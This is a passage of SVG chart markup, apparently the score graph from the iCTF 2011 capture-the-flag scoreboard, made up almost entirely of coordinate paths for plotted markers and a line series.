stroke-width="0.000001"></path><path d="M 374.672 155.172 L 380.328 155.172 380.328 160.828 374.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 372.672 155.172 L 378.328 155.172 378.328 160.828 372.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 370.672 155.172 L 376.328 155.172 376.328 160.828 370.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 368.672 155.172 L 374.328 155.172 374.328 160.828 368.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 366.672 155.172 L 372.328 155.172 372.328 160.828 366.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 364.672 155.172 L 370.328 155.172 370.328 160.828 364.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 362.672 155.172 L 368.328 155.172 368.328 160.828 362.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 360.672 155.172 L 366.328 155.172 366.328 160.828 360.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 358.672 155.172 L 364.328 155.172 364.328 160.828 358.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 356.672 155.172 L 362.328 155.172 362.328 160.828 356.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 354.672 155.172 L 360.328 155.172 360.328 160.828 354.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 352.672 155.172 L 358.328 155.172 358.328 160.828 352.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 350.672 155.172 L 356.328 155.172 356.328 160.828 350.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 348.672 155.172 L 354.328 155.172 354.328 160.828 348.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 346.672 155.172 L 352.328 155.172 352.328 160.828 346.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 344.672 155.172 L 350.328 155.172 350.328 160.828 344.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 342.672 155.172 L 348.328 155.172 348.328 160.828 342.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 340.672 155.172 L 346.328 155.172 346.328 160.828 340.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 338.672 155.172 L 344.328 155.172 344.328 160.828 338.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 337.172 155.172 L 342.828 155.172 342.828 160.828 337.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 335.172 155.172 L 340.828 155.172 340.828 160.828 335.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 333.172 155.172 L 338.828 155.172 338.828 160.828 333.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 331.172 155.172 L 336.828 155.172 336.828 160.828 331.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 329.172 155.172 L 334.828 155.172 334.828 160.828 329.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 327.172 155.172 L 332.828 155.172 332.828 160.828 327.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 325.172 155.172 L 330.828 155.172 330.828 160.828 325.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 323.172 155.172 L 328.828 155.172 328.828 160.828 323.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 321.172 155.172 L 326.828 155.172 326.828 160.828 321.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 319.172 155.172 L 324.828 155.172 324.828 160.828 319.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 317.172 155.172 L 322.828 155.172 322.828 160.828 317.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 315.172 155.172 L 320.828 155.172 320.828 160.828 315.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 313.172 155.172 L 318.828 155.172 318.828 160.828 313.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 311.172 155.172 L 316.828 155.172 316.828 160.828 311.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 309.172 155.172 L 314.828 155.172 314.828 160.828 309.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 307.172 155.172 L 312.828 155.172 312.828 160.828 307.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 305.172 155.172 L 310.828 155.172 310.828 160.828 305.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 303.172 155.172 L 308.828 155.172 308.828 160.828 303.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 301.172 155.172 L 306.828 155.172 306.828 160.828 301.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 299.172 156.672 L 304.828 156.672 304.828 162.328 299.172 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 297.672 156.672 L 303.328 156.672 303.328 162.328 297.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 295.672 156.672 L 301.328 156.672 301.328 162.328 295.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 293.672 156.672 L 299.328 156.672 299.328 162.328 293.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 291.672 156.672 L 297.328 156.672 297.328 162.328 291.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 289.672 156.672 L 295.328 156.672 295.328 162.328 289.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 287.672 156.672 L 293.328 156.672 293.328 162.328 287.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 285.672 156.672 L 291.328 156.672 291.328 162.328 285.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 283.672 156.672 L 289.328 156.672 289.328 162.328 283.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 281.672 156.672 L 287.328 156.672 287.328 162.328 281.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 279.672 156.672 L 285.328 156.672 285.328 162.328 279.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 277.672 156.672 L 283.328 156.672 283.328 162.328 277.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 275.672 156.672 L 281.328 156.672 281.328 162.328 275.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 273.672 156.672 L 279.328 156.672 279.328 162.328 273.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 271.672 156.672 L 277.328 156.672 277.328 162.328 271.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 269.672 156.672 L 275.328 156.672 275.328 162.328 269.672 162.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 267.672 157.172 L 273.328 157.172 273.328 162.828 267.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 265.672 157.172 L 271.328 157.172 271.328 162.828 265.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 263.672 157.172 L 269.328 157.172 269.328 162.828 263.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 261.672 157.172 L 267.328 157.172 267.328 162.828 261.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 259.672 157.172 L 265.328 157.172 265.328 162.828 259.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 257.672 157.172 L 263.328 157.172 263.328 162.828 257.672 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 256.172 157.172 L 261.828 157.172 261.828 162.828 256.172 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 254.172 157.172 L 259.828 157.172 259.828 162.828 254.172 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 252.172 157.172 L 257.828 157.172 257.828 162.828 252.172 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 250.172 157.172 L 255.828 157.172 255.828 162.828 250.172 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 248.172 157.172 L 253.828 157.172 253.828 162.828 248.172 162.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 246.172 166.172 L 251.828 166.172 251.828 171.828 246.172 171.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 244.172 166.172 L 249.828 166.172 249.828 171.828 244.172 171.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 242.172 171.172 L 247.828 171.172 247.828 176.828 242.172 176.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 240.172 184.672 L 245.828 184.672 245.828 190.328 240.172 190.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 238.172 197.172 L 243.828 197.172 243.828 202.828 238.172 202.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 236.172 205.172 L 241.828 205.172 241.828 210.828 236.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 234.172 205.172 L 239.828 205.172 239.828 210.828 234.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 232.172 205.172 L 237.828 205.172 237.828 210.828 232.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 230.172 205.172 L 235.828 205.172 235.828 210.828 230.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 228.172 205.172 L 233.828 205.172 233.828 210.828 228.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 226.172 205.172 L 231.828 205.172 231.828 210.828 226.172 210.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 224.172 207.172 L 229.828 207.172 229.828 212.828 224.172 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 222.172 207.172 L 227.828 207.172 227.828 212.828 222.172 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 220.172 207.172 L 225.828 207.172 225.828 212.828 220.172 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 218.172 207.172 L 223.828 207.172 223.828 212.828 218.172 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 216.672 207.172 L 222.328 207.172 222.328 212.828 216.672 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 214.672 211.672 L 220.328 211.672 220.328 217.328 214.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 212.672 211.672 L 218.328 211.672 218.328 217.328 212.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 210.672 211.672 L 216.328 211.672 216.328 217.328 210.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 208.672 211.672 L 214.328 211.672 214.328 217.328 208.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 206.672 211.672 L 212.328 211.672 212.328 217.328 206.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 204.672 211.672 L 210.328 211.672 210.328 217.328 204.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 202.672 211.672 L 208.328 211.672 208.328 217.328 202.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 200.672 211.672 L 206.328 211.672 206.328 217.328 200.672 217.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 198.672 219.672 L 204.328 219.672 204.328 225.328 198.672 225.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 196.672 224.172 L 202.328 224.172 202.328 229.828 196.672 229.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 194.672 224.172 L 200.328 224.172 200.328 229.828 194.672 229.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 192.672 225.172 L 198.328 225.172 198.328 230.828 192.672 230.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 190.672 228.672 L 196.328 228.672 196.328 234.328 190.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 188.672 228.672 L 194.328 228.672 194.328 234.328 188.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 186.672 228.672 L 192.328 228.672 192.328 234.328 186.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 184.672 228.672 L 190.328 228.672 190.328 234.328 184.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 182.672 228.672 L 188.328 228.672 188.328 234.328 182.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 180.672 228.672 L 186.328 228.672 186.328 234.328 180.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 178.672 228.672 L 184.328 228.672 184.328 234.328 178.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 176.672 228.672 L 182.328 228.672 182.328 234.328 176.672 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 175.172 228.672 L 180.828 228.672 180.828 234.328 175.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 173.172 228.672 L 178.828 228.672 178.828 234.328 173.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 171.172 228.672 L 176.828 228.672 176.828 234.328 171.172 234.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 169.172 229.172 L 174.828 229.172 174.828 234.828 169.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 167.172 229.172 L 172.828 229.172 172.828 234.828 167.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 165.172 229.172 L 170.828 229.172 170.828 234.828 165.172 234.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 163.172 229.672 L 168.828 229.672 168.828 235.328 163.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 161.172 229.672 L 166.828 229.672 166.828 235.328 161.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 159.172 229.672 L 164.828 229.672 164.828 235.328 159.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 157.172 229.672 L 162.828 229.672 162.828 235.328 157.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 155.172 229.672 L 160.828 229.672 160.828 235.328 155.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 153.172 229.672 L 158.828 229.672 158.828 235.328 153.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 151.172 229.672 L 156.828 229.672 156.828 235.328 151.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 149.172 229.672 L 154.828 229.672 154.828 235.328 149.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 147.172 229.672 L 152.828 229.672 152.828 235.328 147.172 235.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 145.172 230.172 L 150.828 230.172 150.828 235.828 145.172 235.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 143.172 231.172 L 148.828 231.172 148.828 236.828 143.172 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 141.172 232.172 L 146.828 232.172 146.828 237.828 141.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 139.172 232.172 L 144.828 232.172 144.828 237.828 139.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 137.172 232.172 L 142.828 232.172 142.828 237.828 137.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 135.672 232.172 L 141.328 232.172 141.328 237.828 135.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 133.672 232.172 L 139.328 232.172 139.328 237.828 133.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 131.672 232.172 L 137.328 232.172 137.328 237.828 131.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 129.672 232.172 L 135.328 232.172 135.328 237.828 129.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 127.672 232.172 L 133.328 232.172 133.328 237.828 127.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 125.672 232.172 L 131.328 232.172 131.328 237.828 125.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 123.672 232.172 L 129.328 232.172 129.328 237.828 123.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 121.672 232.172 L 127.328 232.172 127.328 237.828 121.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 119.672 232.172 L 125.328 232.172 125.328 237.828 119.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 117.672 232.172 L 123.328 232.172 123.328 237.828 117.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 115.672 232.672 L 121.328 232.672 121.328 238.328 115.672 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 113.672 234.172 L 119.328 234.172 119.328 239.828 113.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 111.672 236.172 L 117.328 236.172 117.328 241.828 111.672 241.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 109.672 239.172 L 115.328 239.172 115.328 244.828 109.672 244.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 107.672 240.172 L 113.328 240.172 113.328 245.828 107.672 245.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 105.672 242.672 L 111.328 242.672 111.328 248.328 105.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 103.672 242.672 L 109.328 242.672 109.328 248.328 103.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 101.672 242.672 L 107.328 242.672 107.328 248.328 101.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 99.672 242.672 L 105.328 242.672 105.328 248.328 99.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 97.672 242.672 L 103.328 242.672 103.328 248.328 97.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 95.672 242.672 L 101.328 242.672 101.328 248.328 95.672 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 94.172 242.672 L 99.828 242.672 99.828 248.328 94.172 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 92.172 242.672 L 97.828 242.672 97.828 248.328 92.172 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 90.172 242.672 L 95.828 242.672 95.828 248.328 90.172 248.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 88.172 243.672 L 93.828 243.672 93.828 249.328 88.172 249.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 86.172 249.672 L 91.828 249.672 91.828 255.328 86.172 255.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 84.172 250.172 L 89.828 250.172 89.828 255.828 84.172 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 82.172 250.672 L 87.828 250.672 87.828 256.328 82.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 80.172 250.672 L 85.828 250.672 85.828 256.328 80.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 78.172 250.672 L 83.828 250.672 83.828 256.328 78.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 76.172 250.672 L 81.828 250.672 81.828 256.328 76.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 74.172 250.672 L 79.828 250.672 79.828 256.328 74.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 72.172 250.672 L 77.828 250.672 77.828 256.328 72.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 70.172 250.672 L 75.828 250.672 75.828 256.328 70.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 68.172 250.672 L 73.828 250.672 73.828 256.328 68.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 66.172 250.672 L 71.828 250.672 71.828 256.328 66.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 64.172 250.672 L 69.828 250.672 69.828 256.328 64.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 62.172 250.672 L 67.828 250.672 67.828 256.328 62.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 60.172 250.672 L 65.828 250.672 65.828 256.328 60.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 58.172 250.672 L 63.828 250.672 63.828 256.328 58.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 56.172 250.672 L 61.828 250.672 61.828 256.328 56.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 54.672 250.672 L 60.328 250.672 60.328 256.328 54.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 52.672 250.672 L 58.328 250.672 58.328 256.328 52.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 50.672 250.672 L 56.328 250.672 56.328 256.328 50.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 48.672 250.672 L 54.328 250.672 54.328 256.328 48.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 46.672 250.672 L 52.328 250.672 52.328 256.328 46.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 44.672 250.672 L 50.328 250.672 50.328 256.328 44.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 42.672 250.672 L 48.328 250.672 48.328 256.328 42.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 40.672 250.672 L 46.328 250.672 46.328 256.328 40.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 38.672 250.672 L 44.328 250.672 44.328 256.328 38.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 36.672 250.672 L 42.328 250.672 42.328 256.328 36.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 34.672 250.672 L 40.328 250.672 40.328 256.328 34.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 32.672 250.672 L 38.328 250.672 38.328 256.328 32.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 30.672 250.672 L 36.328 250.672 36.328 256.328 30.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 28.672 250.672 L 34.328 250.672 34.328 256.328 28.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 26.672 250.672 L 32.328 250.672 32.328 256.328 26.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 24.672 250.672 L 30.328 250.672 30.328 256.328 24.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 22.672 250.672 L 28.328 250.672 28.328 256.328 22.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 20.672 250.672 L 26.328 250.672 26.328 256.328 20.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 18.672 250.672 L 24.328 250.672 24.328 256.328 18.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 16.672 250.672 L 22.328 250.672 22.328 256.328 16.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 14.672 250.672 L 20.328 250.672 20.328 256.328 14.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 13.172 250.672 L 18.828 250.672 18.828 256.328 13.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 11.172 250.672 L 16.828 250.672 16.828 256.328 11.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 9.172 250.672 L 14.828 250.672 14.828 256.328 9.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 7.172000000000001 250.672 L 12.828 250.672 12.828 256.328 7.172000000000001 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 5.172000000000001 250.672 L 10.828 250.672 10.828 256.328 5.172000000000001 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 3.172 250.672 L 8.828 250.672 8.828 256.328 3.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 1.1720000000000002 250.672 L 6.827999999999999 250.672 6.827999999999999 256.328 1.1720000000000002 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.70560868571428 L 86.88859180035651 253.70560868571428 L 88.86423054070113 253.70560868571428 L 90.83986928104575 253.70560868571428 L 92.81550802139039 253.70560868571428 L 94.791146761735 253.70560868571428 L 96.76678550207963 253.70560868571428 L 98.74242424242425 253.70560868571428 L 100.71806298276887 253.70560868571428 L 102.69370172311349 253.70560868571428 L 104.66934046345811 253.70560868571428 L 106.64497920380273 253.70560868571428 L 108.62061794414737 253.70560868571428 L 110.59625668449199 253.70560868571428 L 112.57189542483661 253.70560868571428 L 